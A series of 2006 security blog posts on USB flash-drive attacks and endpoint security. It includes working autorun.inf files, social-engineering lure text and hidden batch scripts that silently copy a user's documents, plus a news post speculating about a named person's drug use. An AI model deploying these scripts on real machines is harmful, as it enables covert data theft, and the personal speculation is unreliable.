There has been a lot of talk about “Podslurping” as a new endpoint security threat. Podslurping involves the use of a removable media device, such as an iPod (hence the name) to copy documents from a computer to the removable storage device. Abe Usher introduced the concept a while back and developed a proof of concept as well as another version which only audited the system and made a list of documents the application could have copied.
But really all Podslurping involves is copying files from one place to another. However, to do this you do not really need to develop any sort of special application as Windows has functions built right in, just create a simple batch file using xcopy. Let’s build on the autorun tutorial from last week. We will create an autorun.inf file that calls a couple of batch files.
First create an autorun.inf file that looks like this:
[autorun]
icon=lilguy.ico
open=start.bat
action=Click “OK” to enable USB flash drive
shell\open\command=start.bat
So we will go ahead and use the autorun tricks we learned last week to both prompt the user to run the application, or to automatically run if double clicked. In a actual attack where a malicious user is attempting to steal information from a system they will probably take advantage of the U3 autorun hack so that it runs more quickly, but since we are just showing a proof of concept we don’t need this.
So you will notice that the autorun.inf executes the start.bat file. This file I am going to use to do two things, load the actual slurping batch file commands as well as hide the command prompt my minimizing it, this would help hide exactly what I am doing:
@echo off
@start /min slurp.bat /B
@exit
The next script we will create the script that will actually copy files. For this example, imagine that I just want to copy all Word documents from the target users “My Documents” directory:
@echo off
mkdir %~d0\%computername%
xcopy “C:\Documents and Settings\%username%\My Documents\*.doc” %~d0\%computername% /s/c/q/r/h
@cls
@exit
First I create a directory on my USB flash drive. The “%~d0″ here is a Windows variable that you can use which will output the drive from which the script is currently running. So I tell it to create a directory on my Flash drive and to name the directory the computer’s name, this is just in case I am auditing multiple systems. The xcopy command I have here will then start copying any file with a “.doc” extension it finds, it will descend into subdirectories as well as copy the subdirectories in the same tree as the actual “My Documents” directory it is copying from.
This is just a quick example of podslurping and just how simple it really is. However, there are more malicious podslurping tools out there which do a better job of searching for specific files of value, hide themselves better and even run in the background on startup not just loading files to a USB flash drive, but actually sending files offsite either view email, FTP and even VNC.
posted by akuma @ October 29, 2006 11:36 pm
FBI agents are investigating three USB flash drives that were discovered at a suspected meth lab. Jessica Quintana a data entry clerk at Information Assets Management a Los Alamos Nuclear Facility subcontractor. Some sources are indicating that she worked in the X Division which handles nuclear weapons design data.
According to the police report, three Flash drives were part of the evidence collected, once police found evidence that the data on them contained data from Los Alamos the FBI was brought in.
So this is not exactly a “hack” as there really was no technical wizardry which went into this data thef. And judging from what appears to be Miss Quintana’s MySpace page, she wasn’t exactly technical. So here we have a case where someone with limited technical knowledge, addicted to meth was able to smuggle out three USB flash drives worth of nuclear weapons data.
I am glad to see our Homeland Security initiatives are working, we may be able to block ships coming out of North Korea with nuclear weapons technology, but meth addicts smuggling USB drives full of nuclear weapons data out of Los Alamos appears to be a problem.
Apparently USB flash drives have been banned from Los Alamos for the past two years, but it looks like some folks did not get the memo.
Imagine what could have been done by someone with more ( even basic) technical skills than Miss Quintana, using other techniques and tools (as we know) to install Trojans and other tools which could not only compromise the system the drive is connected to, but also the rest of the network.
Then we have the Meth addict angle, Methamphetamine addicts are not exactly known for their loyalty, as their addiction worsens they will sell all of their possessions, steal whatever they can to make money for their next fix. One would wonder if there is any sort of drug screening that occurs in order to work at the Los Alamos Labs, but maybe the policies for subcontractors is different. However, an employee addicted to drugs makes the perfect mole. I am sure many terrorist groups and countries would have supplied Miss Quintana with all the Meth she needed for the contents of those Flash drives.
One also must wonder how many other USB flash drives full of nuclear secrets may exist out there. These three were discovered by accident, the FBI got lucky, if a Meth user with limited technical skill can smuggle nuclear weapons data out of Los Alamos, who knows what more sophisticated thefts have occured.
Full Police Report
posted by akuma @ October 26, 2006 11:52 pm
Disclaimer: This tutorial is designed to show existing vulnerabilities and should only be used on systems you own, or have permission to execute this on. Removable media devices don’t deploy malicious code and steal data, people do.
Autorun will not work with “regular” USB flash drives the way that they do with CD-ROMs, but there are some tricks that you can do that will come very close. I say “regular” in that as many may know there are ways of modifying U3 drives so that they appear as CD-ROMs on Windows systems and can thus use autorun to silently run your “tools” without any indication anything is happening. The U3 hack however is a bit more complicated, I will do another “How to” on that later. For now let’s just discuss how we can create an autorun.inf file on a regular ‘ol USB flash drive that will do some interesting things.
Also it is important to mention that some of these techniques will even work if autoplay is disabled!
First, although we cannot have an application run automatically with a traditional USB drive, we can make it so that when a USB drive is plugged we have Windows make a suggestion to the user and all they need to do is click “OK” to a specific application or script you have deployed to the flash drive.
First in Notepad create a file called autorun.inf and save it to the root of your USB flash drive of choice. In the autorun file put this:
[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!
The first parameter is “icon” this tells Windows what icon to use as the icon image for the drive etc. This is important for the social engineering portion of the trick, you must consider your target. The image you choose should help instill trust in the application they are about to run, maybe a tantalizing icon of a scantly clad babe, a puppy, or my favorite a cute little cartoon devil holding a USB flash drive.
The “open” parameter indicates the program you wish to run, this can be an executable, or as in this case a .bat file. You could even call a .bat file which calls a series of executables. Go crazy.
The next parameter is “action” this is what will trigger the autorun dialog to appear. This text will appear in the dialog box along with your icon, so you probably want make this friendly, something like “Fun Game,” you probably don’t want to put something like “Click ‘OK’ to install backdoors and trojans!”.
Now unplug your flash drive and then replug it in, a dialog box like this should now appear:
So this is not as good as automatically running the application, but is useful nonetheless and there have actually been successful simulations where this has been used. A security consultancy used this technique as a proof of concept to test a credit union client of theirs. Several drives used this simple technique to run exectue a trojan that sent some simple data to an external email account. They scattered the drives in the parking lot, several employees picked the drives up on their way into work and within a short amount of time the email account they had set up was receiving emails.
Now we have our basic autorun.inf setup. But notice that if you click cancel and then click on the drive you just see the contents of the drive. However we can take this one step further, if the user is smart and their spidey senses are tingling from the dialog menu that appears and they click cancel, with the addition of one more line of code to the autorun.inf file that will automatically execute the code we specify when they click the drive either from “My Computer” or Explorer. This is different than a true autorun as it still requires a user to take an action to exectue the application, but still a significant security risk.
Add these lines to your autorun.inf file
[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!
shell\open\command=howdy.bat
OK save it and then unplug and plug the drive back in again. This time when the prompt appears hit “cancel”. Now go to double click the drive under “My Computer”. The application will automatically execute. By the way, this second portion will still work even if autoplay is disabled on a system and is actually more dangerous than the dialog in my opinion.
So what if we don’t want to execute a command on the drive and just open a webpage? You could execute Explorer in your .bat file to do this, or in the exectuble you run, but there is a quick and easy way to do this in the autorun.inf file. Replace the last line with this instead:
[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!
shellexecute=http://www.usbhacks.com
There we have it. An introduction to the wonderful world of autorun.inf hacks for USB flash drives. Again this should only be tested on your system, or systems you have permission to use this on, we are not responsible for your stupidity. Removable media devices don’t deploy malicious code and steal data, people do. Let us know if you have questions or further ideas, we might send you a free USB flash drive full ‘o love>;-)
You can download the comple files used here, including a basic .bat file.
Questions, comments, ideas or death threats? Send them here.
posted by akuma @ October 25, 2006 10:08 pm
Surpringsingly I have been getting quite a few questions regarding specifically what endpoint security is and why it is important. Most security policies and technologies are focused on keeping people outside of a network from getting in. Yet as we have seen with many of the headlines, the majority of security breaches and data thefts occur internally. Some estimates are even putting the number at 70% of all security breaches occur behind the firewall.
Endpoint security is not a new concept, it is older than computers, it is simply protecting physical access to valuable assets. All IT security measures really go out the window once someone with the technical skills (and sometimes not so technical) has physical access to a system.
Using a small USB flash drive, one can own a system in 2 seconds, this includes installing Trojan programs that email or FTP data to a remote location in the background, gaining remote access to the system for later use, installing back doors including admin accounts, as well as infecting any other removable media device that is plugged into that system.
The greatest hacker tool available is an IT departments’ own apathy when it comes to managing these security threats. Trying to keep the network perimeter secure is difficult enough, without having to manage internal threats.
Understanding endpoint security threats
At the core there are three areas of endpoint security threats that need to be considered. The first involves corporate espionage, evidence and actual cases have shown that employees have been recruited by rival companies and organized crime to steal pertinent data. The scope of these offenses ranges from the theft of intellectual property, customer lists or simply stealing employee lists for headhunters.
The second weakness again involves employees, only they may not need monetary motivation to steal data, it may be that they are disgruntled or recently terminated and they may wish to try and harm the network, destroy data, steal data for their next position.
The third main area that should be considered is pure ignorance. When a data breach, or damage to the network is perpetrated unintentionally. A user that installs unauthorized software for example or an employee who plugs in a USB flash drive or other removable media device that is infected with Trojan. Employees also fall victim to social engineering attacks through telephone calls, phishing scams or other methods.
A new attack vector has actually appeared where emails appearing to be simple marketing emails offering free USB drives, are actually targeted at specific users in a company, and that the actual “free” drive that that user receives in the mail is really loaded with a Trojan that would allow someone outside the company direct access to that system to run reconnaissance scans, steal data, as well as launch attacks.
Prevention
Most corporate networks are doing the bare minimum when it comes to securing against internal threats for several reasons. The first being ignorance of the actual issues, although this sounds silly it actually rings true more often than most would like to admit. Most IT departments are already stretched beyond their limits in terms of manpower and resources, that they have not choice but to trust employees, and hope that not breaches occur, thereby ignoring the issue altogether. If trust, hope and ignorance are part of your three pronged approach to endpoint security issues, we will be seeing your company in the headlines soon.
Admit you have a problem
The first step to prevention is to realize you have a problem. You then must clearly establish policies regarding the use of removable media devices, including USB flash drives, iPods and even smart phones. It may also be necessary to consider who has access to CD/DVD burners.
Email is not just for viruses
Email attachments have been a nemesis of IT admins for quite a long time in terms of the propagation of viruses and worms, but very little has been done looking at what happens when employees email confidential data outside to personal email accounts, policies and auditing may need to be implemented to secure corporate data.
Printers
An employee, who is locked out of removable media devices, may just choose to print the data out. It might be necessary to setup auditing systems to show who has printed what documents, as well as limit who has access to printers on a network.
Enforcement
A policy is useless unless users are both educated regarding them, as well as them understanding why they are implemented. Many times policies are not enforced as they may hinder productivity; however there are technologies available that will help IT admins both enforce these policies, while still allowing specific users or groups access to particular devices.
posted by akuma @ October 21, 2006 4:11 pm
Simple little technique to have your USB drive phone home if it is lost ( or stolen ). To further this we may have a legitimate use for the HAK5’s USB Hacksaw and USB Switchblade applications, if your USB drive is stolen and the system name or antidote file is not present you deploy various files to send data to a remote email address and other tools to make whoever stole your drive very sorry for what they have done.
posted by akuma @ 2:46 am
